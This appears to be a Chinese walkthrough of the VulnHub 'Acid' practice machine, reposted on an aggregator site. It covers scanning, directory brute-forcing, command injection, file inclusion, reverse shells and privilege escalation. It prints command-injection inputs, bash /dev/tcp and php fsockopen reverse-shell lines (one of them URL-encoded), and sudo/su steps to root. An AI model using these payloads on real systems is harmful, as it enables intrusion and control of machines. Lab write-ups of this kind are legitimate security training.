当前位置: 首页 > news >正文

VulnHub-Acid(1/100)

news 2025/6/28 4:03:20

 参考链接:

​​​​​​​【VulnHub】Acid靶场复盘-CSDN博客

靶场渗透(二)——Acid渗透_ambassador 靶场渗透-CSDN博客

网络安全从0到0.5之Acid靶机实战渗透测试 | CN-SEC 中文网

Vulnhub靶场渗透练习(四) Acid - 紅人 - 博客园

红日团队笔记

信息收集

主机:kali,靶机:Acid

下载地址:https://download.vulnhub.com/acid/Acid.rar

扫描网段:arp-scan -l

扫描端口:

nmap -A -p- -sV 192.168.91.146(扫描全部端口)

开放端口33447,底层服务:Apache2.4.10,操作系统:Ubuntu

192.168.91.146:33447访问

dirb爆破目录,其实是没有有效结果的

查看页面源代码

转码两次后获得wow.jpg

访问路径,获取图片

在editor中发现一串数字,放入十六进制转换为ascii码

7aee0f6d588ed9905ee37f16a7c610d4,32位大概率为md5

解密为63425

最后发现没啥用

爆破目录

使用dirbuster爆破目录,用small字典,爆破提示的Challenge

目录下存在index.php,error.php,cake.php,include.php,hacked.php

或者直接使用dirb调用字典

使用-x参数,爆破.php文件,用big字典

dirb http://192.168.91.146:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

渗透测试

访问cake.php,标题提示含有Magic_Box目录,爆破目录

http://192.168.91.146:33447/Challenge/cake.php/Magic_Box

这里需要多尝试 一下,/Challenge/Magic_Box,从这个位置开始访问。

命令执行

这个ip地址可以爆破出一个页面,进行命令执行

127.0.0.1;cat /etc/passwd,存在命令执行漏洞

进行命令执行测试,寻找默认密码

访问include.php,存在文件包含漏洞

转包,进行URL编码,/变为%2F,实现文件包含

关注地址为:/bin/bash

漏洞利用

使用通过URL编码的命令进行bash反弹,这里ip为攻击机(kali)的地址

bash反弹,单引号和双引号好像都行

bash -c:运行后面的字符串作为 Bash 命令。 'bash -i >& /dev/tcp/192.168.91.138/6666 0>&1':这是要执行的 Bash 命令。它包含以下几个部分: bash -i:启动一个交互式的 Bash shell。 -i 选项表示交互式。 >& /dev/tcp/192.168.91.138/6666:将标准输出和标准错误重定向到指定的 IP 地址和端口。 /dev/tcp 是一个特殊的设备文件,Bash 可以将其视为网络套接字。 0>&1:将标准输入重定向到标准输出。这样,我们就可以在远程主机上执行命令并获取输出。 此命令的目的是将被攻击主机上的 Bash shell 与指定 IP 地址和端口上的远程主机建立连接,使攻击者能够通过该连接远程控制被攻击主机并执行命令。

bash -c 'bash -i >& /dev/tcp/192.168.217.130/6666 0>&1'

127.0.0.1; bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

php反弹:

php -r '$sock=fsockopen("192.168.91.138",6666);exec("/bin/bash -i &3 2>&3");'

直接在burpsuite里进行调整,点击encode,到URL

127.0.0.1|%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%31%2e%31%33%38%2f%36%36%36%36%20%30%3e%26%31%27

192.168.217.130

监听

nc -lvp 6666

成功上线

权限提升

进行提权

这里是su执行,必须需要一个终端

python导入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd

查看用户名,

acif、saman、root为:/bin/bash

/tmp存放临时文件

/tmp$ ls /home 出现用户

这里应该是直接到home目录查看

前面已经获取了密码

查找acid用户创建的文件(不显示错误)

find:一个用于搜索文件和目录的常用命令。 /:表示要搜索的起始路径,这里是根目录。 -user acid:指定只搜索由用户"acid"创建的文件和目录。 2>/dev/null:将标准错误输出重定向到

/dev/null,即丢弃错误信息,避免出现权限错误提示。

find / -user acid 2>/dev/null

出现了一个流量包

方法一:

先进到/home,再cd到/sbin

python -m SimpleHTTPServer 8080

出现文件,下载分析

tcp.stream只看tcp协议的包

发现用户密码1337hax0r

进行提权

当前用户有 sudo 权限,想切换到 root

先切换到saman

www-data@acid:/var/www/html/Challenge/Magic_Box$ su samansu samanPassword: 1337hax0r

需要的是当前用户的密码

sudo -i

查看当前用户的权限情况

su权限过高,直接提权到root

这里不能直接su root,并不知道root密码

使用

sudo -l

只需要当前用户的密码

得到flag

http://www.lryc.cn/news/517436.html

相关文章:

  • MATLAB语言的正则表达式
  • 通过 route 或 ip route 管理Linux主机路由
  • MYSQL--------SQL 注入简介MySQL SQL Mode 简介
  • 第6章——HTTP首部
  • 多行输入模式(dquote> 提示符)double quote(双引号)
  • 【什么是MVCC?】
  • HarmonyOS开发:粒子动画应用实战
  • 数据库课设——网上花店销售管理系统(上)
  • 用于AI的 数据存储其获取介绍
  • flutter 专题二十四 Flutter性能优化在携程酒店的实践
  • L28.【LeetCode笔记】移动零(三种解法)
  • jenkins入门10--自动化构建
  • el-table拖拽表格
  • 如何轻松反转C# List<T>中的元素顺序
  • Transformer中Self-Attention以及Multi-Head Attention模块详解(附pytorch实现)
  • 在Nvidia Jetson ADX Orin中使用TensorRT-LLM运行llama3-8b
  • 六十一:HTTP/2的问题及HTTP/3的意义
  • IOS开发如何从入门进阶到高级
  • 非一般的小数:小数的概念新解、小数分类、浮点数的存储
  • 关于游戏销量的思考
  • JuiceFS 详解:一款为云原生设计的高性能分布式文件系统
  • 百度Android面试题及参考答案 (下)
  • RK3588+FPGA全国产异步LED显示屏控制卡/屏幕拼接解决方案
  • Elasticsearch:Query rules 疑难解答
  • 四、VSCODE 使用GIT插件
  • 键盘鼠标共享工具Barrier(kail与windows操作系统)
  • QTcpSocket 中设置接收缓冲区大小
  • Arduino IDE刷微控制器并下载对应固件的原由
  • Jurgen提出的Highway Networks:LSTM时间维方法应用到深度维
  • Netron可视化深度学习的模型框架,大大降低了大模型的学习门槛